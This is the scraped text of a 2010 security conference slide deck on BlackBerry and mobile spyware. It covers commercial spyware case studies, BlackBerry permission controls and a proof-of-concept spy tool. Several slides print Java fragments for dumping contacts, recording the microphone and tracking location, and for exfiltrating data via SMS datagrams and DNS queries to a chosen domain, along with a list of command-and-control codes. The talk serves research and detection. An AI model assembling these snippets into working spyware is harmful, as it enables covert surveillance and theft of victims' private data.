SlideShare a Scribd company logo
1 of 58
The Coming Wave of Smartphone Attacks
  An Analysis of Blackberry and Other Mobile Device Spyware




  The Monkey Steals The Berries
Outline

 Background
 Case Studies of Mobile Spyware
 Blackberry Security Mechanisms
 Installation Methods
 Effects and Behaviors
 Technical Specifications
 Methods of Detection and Future Work
 Demonstration




© 2010 Veracode, Inc.                    2
Presenter Background

Currently
       Sr. Security Researcher, Veracode, Inc.

Previously
       Security Consultant - Symantec
       Security Consultant - @Stake
       Incident Response and Forensics
           Handler – US Government

Wishes He Was
       Infinitely Rich
       Personal Trainer to hot Hollywood
       starlets




© 2010 Veracode, Inc.                            3
Mobile Spyware

 Often includes modifications to
  legitimate programs designed to
  compromise the device or device
  data
 Often inserted by those who have
  legitimate access to source code or
  distribution binaries
 May be intentional or inadvertent
 Not specific to any particular
  programming language
 Not specific to any particular mobile
  Operating System


© 2010 Veracode, Inc.                     4
Attacker Motivation

 Practical method of compromise for many systems
      – Let the users install your backdoor on systems you have no access to
      – Looks like legitimate software so may bypass mobile AV
 Retrieve and manipulate valuable private data
      – Looks like legitimate application traffic so little risk of detection
 For high value targets such as financial services and government it
  becomes cost effective and more reliable
      – High-end attackers will not be content to exploit opportunistic vulnerabilities,
        which might be fixed and therefore unavailable at a critical juncture. They
        may seek to implant vulnerability for later exploitation
      – Think “Aurora” for Mobile Devices




© 2010 Veracode, Inc.                                                                      5
Why is Mobile The Future of Spyware




© 2010 Veracode, Inc.                                         6
Units Sold By Operating System
               90,000.00
                             80,879
               80,000.00
                           72,934

               70,000.00

               60,000.00
  Units Sold




               50,000.00

               40,000.00                  34,347                                                                                           2008 Units
                                                                                                                                           2009 Units
               30,000.00                               24,890
                                       23,149

               20,000.00                                        16,498
                                                    11,418                    10,622
               10,000.00                                             15,028                  6,798
                                                                                                          1,193     4,027
                                                                                  8,127   641         0                     1,112
                    0.00
                           Symbian    Research In   iPhone OS   Microsoft      Linux      Android    WebOS         Other OSs
                                        Motion                  Windows
                                                                 Mobile
                                                                                                           Data Source: DISTMO Appstore Analytics
                                                                   Operating System                                  www.appstore.info




© 2010 Veracode, Inc.                                                                                                                                   7
Units Sold Market Growth
                                       8%

                                                                        6%
                                       6%
   Percentage Growth in Market Share




                                       4%                  3%                                                     3%



                                       2%

                                                                                                                            0%
                                       0%
                                             Symbian   Research In   iPhone OS   Microsoft        Linux         Android   WebOS    Other OSs          0%
                                                         Motion                  Windows
                                                                                  Mobile
                                       -2%
                                                                                                                                        -2%
                                                                                    -3%             -3%
                                       -4%



                                       -6%     -6%
                                                                                             Operating System

                                                                                                                             Data Source: DISTMO Appstore Analytics
                                                                                                                                       www.appstore.info




© 2010 Veracode, Inc.                                                                                                                                                 8
Application Counts

                                     160,000        150,998


                                     140,000


                                     120,000
   Number Of Applications In Store
     Last Counted Jan/Feb 2010




                                     100,000


                                      80,000


                                      60,000


                                      40,000

                                                                     19,897
                                      20,000
                                                                                       6118             5291
                                                                                                                          1452                 944
                                          0
                                               iPhone App Store    Android       Nokia Ovi Store   Blackberry App   Palm App Catalog      Windows
                                                                  Marketplace      (Maemo)             World                             Marketplace
                                                                                                                         Data Source: DISTMO Appstore Analytics
                                                                                        Marketplace Name                           www.appstore.info




© 2010 Veracode, Inc.                                                                                                                                             9
iPhone Applications Sold



                                      3.00
    Applications Sold (In Billions)




                                      2.50

                                      2.00

                                      1.50

                                       1.00

                                       0.50

                                       0.00




Data Source: Gartner, Inc., a research and advisory firm




© 2010 Veracode, Inc.                                                                 10
Back To The Future




© 2010 Veracode, Inc.   11
Back To The Future




© 2010 Veracode, Inc.   12
Case Studies of Mobile Spyware




© 2010 Veracode, Inc.                                    13
FlexiSpy

 http://www.flexispy.com
 $149 - $350 PER YEAR depending on features
 Features
      – Remote Listening
      – C&C Over SMS
      – SMS and Email Logging
      – Call History Logging
      – Location Tracking
      – Call Interception
      – GPS Tracking
      – Symbian, Blackberry, Windows Mobile Supported


© 2010 Veracode, Inc.                                   14
FlexiSpy Web Site Quotes

 “Download FlexiSPY spyphone software directly onto a mobile
  phone and receive copies of SMS, Call Logs, Emails, Locations and
  listen to conversations within minutes of purchase. “
 “Catch cheating wives or cheating husbands, stop employee
  espionage, protect children, make automatic backups, bug meetings
  rooms etc.”
 “F Secure seem to think that its ok for them to interfere with
  legitimate, legal and accountable software. Who appointed them
  judge, jury and executioner anyway, and why wont they answer our
  emails, so we have to ask who is the real malware? Here is how to
  remove FSecure malware from your device. Please don't believe the
  fsecure fear mongers who simply wish you to buy their products.”



© 2010 Veracode, Inc.                                                 15
Mobile Spy

 http://www.mobile-spy.com
 $49.97 PER QUARTER or $99.97 PER YEAR
 Features
      – SMS Logging
      – Call Logging
      – GPS Logging
      – Web URL Logging
      – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian




© 2010 Veracode, Inc.                                                              16
Mobile Spy Web Site Quotes

 “This high-tech spy software will allow you to see exactly what they
  do while you are away. Are your kids texting while driving or using
  the phone in all hours of the night? Are your employees sending
  company secrets? Do they erase their phone logs?”
 “Our software is not for use on a phone you do not own or have
  proper permission to monitor from the user or owner. You must
  always follow all applicable laws and regulations in your region.”
 “Purchased by more than 30,000 customers in over 150 countries”




© 2010 Veracode, Inc.                                                    17
Etisalat (SS8)

 Cell carrier in United Arab Emirates (UAE)
 Pushed via SMS as “software patch” for Blackberry smartphones
 Upgrade urged to “enhance performance” of Blackberry service
 Blackberry PIN messaging as C&C
 Sets FLAG_HIDDEN bit to true
 Interception of outbound email / SMS only
 Discovered due to flooded listener server cause retries that drained
  batteries of affected devices
 Accidentally released the .jar as well as the .cod (ooopsie?!)




© 2010 Veracode, Inc.                                                    18
Bugs & Phonesnoop

 Bugs
      – Exfiltration of inbound and outbound email
      – Hidden


 PhoneSnoop
      – Remotely turn on a Blackberry phone microphone
      – Listen in on target ambient conversation




© 2010 Veracode, Inc.                                    19
Storm8 Phone Number Farming

      – iMobsters and Vampires Live (and others)
      – “Storm8 has written the software for all its games in such a way that it
        automatically accesses, collects, and transmits the wireless telephone
        number of each iPhone user who downloads any Storm8 game," the suit
        alleges. " ... Storm8, though, has no reason whatsoever to access the
        wireless phone numbers of the iPhones on which its games are installed."
      – “Storm8 says that this code was used in development tests, only
        inadvertently remained in production builds, and removed as soon as it was
        alerted to the issue.”


      – These were available via the iTunes App Store!
      – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html




© 2010 Veracode, Inc.                                                                20
Symbian Sexy Space

      – Poses as legitimate server ACSServer.exe
      – Calls itself 'Sexy Space„
      – Steals phone and network information
      – Exfiltrates data via hacker owned web site connection
      – Can SPAM contact list members
      – Basically a “botnet” for mobile phones
      – Signing process
            Anti-virus scan using F-Secure
                - Approx 43% proactive detection rate (PCWorld)
            Random selection of inbound manually assessed
      – Symbian signed this binary as safe!
      – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm


© 2010 Veracode, Inc.                                                   21
Symbian MergoSMS

      – The worm spreads as self-signed (untrusted) SIS installers
      – Installer contains sub-SIS installers some of them signed by Symbian.
      – Spreads by sending text messages
            Contain variable messages in Chinese and a link to a website
            Going to link results in worm download
      – On phone reboot malware runs, downloads worm payload, completing
        infection
      – The worm was spread on Chinese file sharing web sites
      – Originally spread as games, themes, etc. for Symbian Series60 3rd &
        5th edition phones.


      – http://www.f-secure.com/v-descs/trojan_symbos_merogosms.shtml



© 2010 Veracode, Inc.                                                           22
09Droid – Banking Applications Attack

      – Droid app that masquerades as any number of different target banking
        applications
      – Target banks included
            Royal Bank of Canada
            Chase
            BB&T
            SunTrust
            Over 50 total financial institutions were affected
      – May steal and exfiltrate banking credentials
      – Approved and downloaded from Google’s Android Marketplace!
      – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps-
        market
      – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953
      – http://www.f-secure.com/weblog/archives/00001852.html
© 2010 Veracode, Inc.                                                               23
Blackberry Security Mechanisms




© 2010 Veracode, Inc.                                    24
Blackberry Takes Security Seriously

 KB05499: Protecting the BlackBerry smartphone and BlackBerry
  Enterprise Server against malware
  http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp
  e=kc&externalId=KB05499
 Protecting the BlackBerry device platform against malware
  http://docs.blackberry.com/en/admin/deliverables/1835/Protecting
  the BlackBerry device platform against malware.pdf
 Placing the BlackBerry Enterprise Solution in a segmented network
  http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_
  BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf
 BlackBerry Enterprise Server Policy Reference Guide
  http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer
  ence_Guide.pdf

© 2010 Veracode, Inc.                                                  25
Does It Really Matter?!




    Only 23% of smartphone owners use the security software
                   installed on the devices.
    (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009)


    13% of organizations currently protect from mobile viruses
                        (Mobile Security 2009 Survey by Goode Intelligence)




© 2010 Veracode, Inc.                                                             26
Code Signing

 Subset of Blackberry API considered “controlled”
 Use of controlled package, class, or method requires appropriate
  code signature
 Blackberry Signature Tool comes with the Blackberry JDE
 Acquire signing keys by filling out a web form and paying $20
      – This not is a high barrier to entry
      – 48 hours later you receive signing keys
 Install keys into signature tool




© 2010 Veracode, Inc.                                                27
Code Signing Process

 Hash of code sent to RIM for API tracking purposes only
 RIM does not get source code
 COD file is signed based on required keys
 Application ready to be deployed


 Easy to acquire anonymous keys




© 2010 Veracode, Inc.                                       28
IT Policies

 Requires connection to Blackberry Enterprise Server (BES)
 Supersedes lower levels of security restrictions
 Prevent devices from downloading third-party applications over
  wireless
 Prevent installation of specific third-party applications
 Control permissions of third party applications
      – Allow Internal Connections
      – Allow Third-Party Apps to Use Serial Port
      – Allow External Connections
 MOSTLY “Default Allow All” policy for BES and non-BES
  devices


© 2010 Veracode, Inc.                                              29
Application Policies

 Can be controlled at the BES
 If no BES present, controls are set on the handheld itself
 Can only be MORE restrictive than the IT policy, never less
 Control individual resource access per application
 Control individual connection access per application
 MOSTLY “Default Allow All” policy for BES and non-BES
  devices




© 2010 Veracode, Inc.                                           30
V4.7.0.148 Default 3rd Party Application Permissions


                          Bluetooth        Phone
USB Connections                                            Location Data
                         Connections     Connections


                           Internet           IPC         Device Settings


                         Application
          Media                             Themes        Input Simulation
                        Management


                                         Security Timer
 Browser Filtering        Recording
                                            Reset


      Email Data        Organizer Data       Files         Security Data


© 2010 Veracode, Inc.                                                        31
V5.0.0.328 Default 3rd Party Application Permissions


                          Bluetooth        Phone
USB Connections                                             Location Data
                         Connections     Connections


  Server Network           Internet           IPC          Device Settings


                         Application
          Media                             Themes         Input Simulation
                        Management


                                         Security Timer   Display Information
 Browser Filtering        Recording
                                            Reset            While Locked


      Email Data        Organizer Data       Files          Security Data


© 2010 Veracode, Inc.                                                         32
V5.0.0.328 Trusted 3rd Party Application Permissions


                          Bluetooth        Phone
USB Connections                                             Location Data
                         Connections     Connections


  Server Network           Internet           IPC          Device Settings


                         Application
          Media                             Themes         Input Simulation
                        Management


                                         Security Timer   Display Information
 Browser Filtering        Recording
                                            Reset            While Locked


      Email Data        Organizer Data       Files          Security Data


© 2010 Veracode, Inc.                                                         33
Installation Methods




© 2010 Veracode, Inc.                          34
Installation Methods

 Accessing a web site using the BlackBerry Browser and choosing to
  download the application over the network (OTA Installation)
 Running the application loader tool of the BlackBerry Desktop
  Manager and choosing to download the application onto the
  BlackBerry device using a physical connection to the computer
 Blackberry BES push the application to your user community


 Get it into the Blackberry App World and let the user choose to
  install it for you!




© 2010 Veracode, Inc.                                                 35
Installation Files

 .COD files: A COD file is a proprietary file format developed by RIM
  that contains compiled and packaged application code.
 .JAD files: An application descriptor that stores information about
  the application itself and the location of .COD files
 .JAR files: a JAR file (or Java ARchive) is used for aggregating
  many files into one. It is generally used to distribute Java classes
  and associated metadata.
 .ALX files: Similar to the .JAD file, in that it holds information about
  where the installation files for the application are located




© 2010 Veracode, Inc.                                                        36
txsBBSpy Effects and Behaviors




© 2010 Veracode, Inc.                                    37
txsBBSpy Logging and Dumping

               Monitor connected / disconnected calls
               Monitor PIM added / removed / updated
               Monitor inbound SMS
               Monitor outbound SMS
               Real Time track GPS coordinates



               Dump all contacts
               Dump current location
               Dump phone logs
               Dump email
               Dump microphone capture (security prompted)



© 2010 Veracode, Inc.                                        38
txsBBSpy Exfiltration and C&C Methods

               SMS (No CDMA)
               SMS Datagrams (Supports CDMA)
               Email
               HTTP GET
               HTTP POST
               TCP Socket
               UDP Socket
               DNS Exfiltration



                Default command and control to inbound SMS
                TXSPROTO Bidirectional TCP based command and control



© 2010 Veracode, Inc.                                                  39
txsBBSpy Technical Specifications




© 2010 Veracode, Inc.                                       40
Technical Methods




 Data Dumpers
 Listeners
 Exfiltration Methods
 Command and Control




© 2010 Veracode, Inc.    41
Dump Contact Information
 API
     – javax.microedition.pim
     – net.rim.blackberry.API.pdap
 Pseudocode
   PIM pim = PIM.getInstance();
   BlackBerryPIMList contacts = (BlackBerryPIMList)
   pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);
   Enumeration eContacts = contacts.items();
   Contact contact = (Contact) eContacts.nextElement();
    if (contacts.isSupportedField(Contact.EMAIL)) {
     if (contact.countValues(Contact.EMAIL) > 0) email =
   contact.getString(Contact.EMAIL, 0);
    }



© 2010 Veracode, Inc.                                      42
Dump Microphone
 API
     – javax.microedition.media.control
     – javax.microedition.media.manager
     – javax.microedition.media.player
 Pseudocode
     Player p = Manager.createPlayer("capture://audio");
     RecordControl rc = (RecordControl)p.getControl("RecordControl");
     ByteArrayOutputStream os = new ByteArrayOutputStream();
     rc.setRecordStream(os);
     rc.startRecord();




© 2010 Veracode, Inc.                                                   43
Location Listener

 Create the class that implements LocationListener Interface
 Get LocationProvider instance
 Add LocationListener
 API
      – javax.microedition.location.LocationProvider.getInstance
      – javax.microedition.location.LocationProvider.setLocationListener
 Pseudocode
    ll = new LocListener();
    lp = LocationProvider.getInstance(null);
    lp.setLocationListener(ll, 1, 1, 1);




© 2010 Veracode, Inc.                                                      47
SMS Outbound Listener

 Create class that implements “SendListener” interface
 Add the SendListener
 API
      – net.rim.blackberry.api.sms.SMS
      – javax.wireless.messaging.TextMessage
 Pseudocode
    sl = new SMSOUTListener();
    SMS.addSendListener(sl);




© 2010 Veracode, Inc.                                     48
PIM Listener

 Create the class that implements PIMListListener Interface
 Open Target PIMList and Add PIMListListener
 API
      – javax.microedition.pim.PIM.getInstance()
      – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener
 Pseudocode
    pl = new PhoneLogger();
    pim = PIM.getInstance();
    contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST,
          PIM.READ_ONLY);
    contacts.addListener(piml);




© 2010 Veracode, Inc.                                                  51
SMS Datagram Exfiltration

 API
      – javax.microedition.io.Connector
      – javax.microedition.io.DatagramConnection
      – javax.microedition.io.Datagram
 Pseudocode
    DatagramConnection dc =
          (DatagramConnection)Connector.open("sms://"+this.pnum+":3590
    ");
    Datagram d = dc.newDatagram(dc.getMaximumLength());
    byte[] buf = msg.getBytes();
    d.setData(buf, 0, buf.length);
    d.write(buf, 0, buf.length);
    dc.send(d);


© 2010 Veracode, Inc.                                                    52
DNS Exfiltration

do {
    // Code to trim the message to 200 chars per iteration
}
try {
    msg2 = Base64OutputStream.encodeAsString(msg2.getBytes(), 0, msg2.length(),
    false, false);
    conn =
    (DatagramConnection)Connector.open("udp://"+msg2+"."+this.domain+":7272;4444
    ");
    conn.close();
} catch (ConnectionNotFoundException e)    {
    return;
} catch (IOException e){
    // Do nothing, just catch and ignore
}
} while (msg.length() > 200);



© 2010 Veracode, Inc.                                                             54
Threaded Exfiltration

 Listener based exfiltration methods use separate thread
 Doesn‟t freeze UI interface
 Queues messages outbound if network is slow
 ThreadedSend extends Thread class
 Uses run() method to call exfiltrate()




© 2010 Veracode, Inc.                                       58
Command and Control Channels

 Default is inbound SMS communication
 Bi-drectional TXSPROTO TCP based command and control
      – Additional Stealth (intentionally not completely invisible)
      – Allows for pretty GUI clients (basic mock up done)
      – Will more easily allow for control of multiple victims
      – Can be used to easily implement novelty attacks
            Swap the contact databases of two victims
            Easily have phone A call phone B
            Integrated Google earth tracking of victim without parsing return email responses
            Much more shenanigans!




© 2010 Veracode, Inc.                                                                            59
Command and Control Channels

 initCandC(int a)
      – Initializes inbound SMS listener if passed a == 1
      – Kills spyware otherwise
      – Listens for commands and acts accordingly

        TXSDIE           TXSPHLON        TXSPHLOFF        TXSPIMON      TXSPIMOFF

     TXSSLINON           TXSSLINOFF      TXSSLOUTON     TXSSLOUTOFF      TXSGLON

     TXSGLOFF           TXSEXFILSMS     TXSEXFILSMSDG   TXSEXFILEMAIL   TXSEXFILGET

  TXSEXFILPOST          TXSEXFILTCP      TXSEXFILUDP    TXSEXFILDNS     TXSDUMPGPS

    TXSDUMPPL           TXSDUMPEMAIL     TXSDUMPMIC     TXSDUMPCON       TXSPROTO

 TXSPORT[PORT]          TXSPHONE:[PN]    TXSURL[URL]    TXSGTIME:[N]     TXSPING

     TXS:[HOST]           TXSIP:[IP]    TXSEM:[EMAIL]




© 2010 Veracode, Inc.                                                                 60
Methods of Detection and Future Work




© 2010 Veracode, Inc.                                          61
Methods of Detection

 Additional Operating System Prompts
      – Remove the “Trust Application” prompt requiring individual configuration
 Signature Based
      – This is how the current anti-virus world is failing
 Sandbox Based Execution Heuristics
      – Still requires execution in a sandbox and is reactive
      – Can‟t ensure complete execution
 Static Decompilation and Analysis
      – Enumeration of sources of sensitive taint and exfiltration sinks
      – Control/Data flow mapping for tracing sensitive taint from source to sink
      – Compare findings against expected values


© 2010 Veracode, Inc.                                                               62
Future Work (Offensive AND Defensive)

 Reverse engineer .cod file format
 Continued research into unobstructed installation methods (requires
  exploitation)
 Infect PC with virus that acts as distribution hub
 Research additional exfiltration methods for tunneling without
  prompting




© 2010 Veracode, Inc.                                                   63
Demonstration




© 2010 Veracode, Inc.                   64
Conclusion

 We are currently trusting the vendor application store provider for the
  majority of our mobile device security
 Minimal methods of real time eradication or detection of spyware
  type activities
 No easy/automated way to confirm for ourselves what the
  applications are actually doing




© 2010 Veracode, Inc.                                                   65
The Monkey Steals the Berries!
                                Questions?
© 2010 Veracode, Inc.                                    66
Questions?

More Related Content

What's hot

AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010AdMob Inc
 
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Ross Sleight
 
The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010Gemius
 
Ad Mob Mobile Metrics Feb 10
Ad Mob  Mobile  Metrics  Feb 10Ad Mob  Mobile  Metrics  Feb 10
Ad Mob Mobile Metrics Feb 10bianchiassociates
 
The rules of mobile advertising
The rules of mobile advertisingThe rules of mobile advertising
The rules of mobile advertisingSeungyul Kim
 
China Mvas Changing Environment 2007
China Mvas Changing Environment 2007China Mvas Changing Environment 2007
China Mvas Changing Environment 2007Bruno Bensaid
 
Roadshow asia nick lane internet & social media
Roadshow asia nick lane internet & social mediaRoadshow asia nick lane internet & social media
Roadshow asia nick lane internet & social mediamobilesquared Ltd
 
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukTarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukJames Cameron
 
Facebook: an investment for the future
Facebook: an investment for the futureFacebook: an investment for the future
Facebook: an investment for the futureIdeas4Tomorrow
 
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V ConferenceProcontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V ConferenceProcontent.Ru Magazine
 
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyThe Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyBernard Leong
 
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаМониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаAgency of Industrial Marketing
 

What's hot (14)

AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010
 
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
 
Mobile Vas
Mobile VasMobile Vas
Mobile Vas
 
The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010
 
Ad Mob Mobile Metrics Feb 10
Ad Mob  Mobile  Metrics  Feb 10Ad Mob  Mobile  Metrics  Feb 10
Ad Mob Mobile Metrics Feb 10
 
The rules of mobile advertising
The rules of mobile advertisingThe rules of mobile advertising
The rules of mobile advertising
 
The death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat ZaretskyThe death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat Zaretsky
 
China Mvas Changing Environment 2007
China Mvas Changing Environment 2007China Mvas Changing Environment 2007
China Mvas Changing Environment 2007
 
Roadshow asia nick lane internet & social media
Roadshow asia nick lane internet & social mediaRoadshow asia nick lane internet & social media
Roadshow asia nick lane internet & social media
 
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukTarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
 
Facebook: an investment for the future
Facebook: an investment for the futureFacebook: an investment for the future
Facebook: an investment for the future
 
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V ConferenceProcontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
 
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyThe Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web Economy
 
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаМониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
 

Viewers also liked

Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaTyler Shields
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerTyler Shields
 
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?Tyler Shields
 
Infragard 2004 - Web Attacks and Defenses
Infragard 2004 - Web Attacks and DefensesInfragard 2004 - Web Attacks and Defenses
Infragard 2004 - Web Attacks and DefensesTyler Shields
 
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTriangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTyler Shields
 
CarolinaCon 2006 Reverse Engineering 101
CarolinaCon 2006 Reverse Engineering 101CarolinaCon 2006 Reverse Engineering 101
CarolinaCon 2006 Reverse Engineering 101Tyler Shields
 
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityIntelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityTyler Shields
 
CarolinaCon 2008 Rootkits Then and Now
CarolinaCon 2008 Rootkits Then and NowCarolinaCon 2008 Rootkits Then and Now
CarolinaCon 2008 Rootkits Then and NowTyler Shields
 
Blackhat USA Mobile Security Panel 2011
Blackhat USA Mobile Security Panel 2011Blackhat USA Mobile Security Panel 2011
Blackhat USA Mobile Security Panel 2011Tyler Shields
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyTyler Shields
 
CarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-DebuggingCarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-DebuggingTyler Shields
 
The Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIRThe Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIRTyler Shields
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyTyler Shields
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Tyler Shields
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...Tyler Shields
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile DeviceTyler Shields
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesTyler Shields
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers ViewTyler Shields
 

Viewers also liked (20)

Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
 
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
 
Infragard 2004 - Web Attacks and Defenses
Infragard 2004 - Web Attacks and DefensesInfragard 2004 - Web Attacks and Defenses
Infragard 2004 - Web Attacks and Defenses
 
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTriangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
 
CarolinaCon 2006 Reverse Engineering 101
CarolinaCon 2006 Reverse Engineering 101CarolinaCon 2006 Reverse Engineering 101
CarolinaCon 2006 Reverse Engineering 101
 
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityIntelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software Security
 
CarolinaCon 2008 Rootkits Then and Now
CarolinaCon 2008 Rootkits Then and NowCarolinaCon 2008 Rootkits Then and Now
CarolinaCon 2008 Rootkits Then and Now
 
Blackhat USA Mobile Security Panel 2011
Blackhat USA Mobile Security Panel 2011Blackhat USA Mobile Security Panel 2011
Blackhat USA Mobile Security Panel 2011
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
 
CarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-DebuggingCarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-Debugging
 
The Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIRThe Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIR
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile Device
 
Shmoocon 2010 - The Monkey Steals the Berries
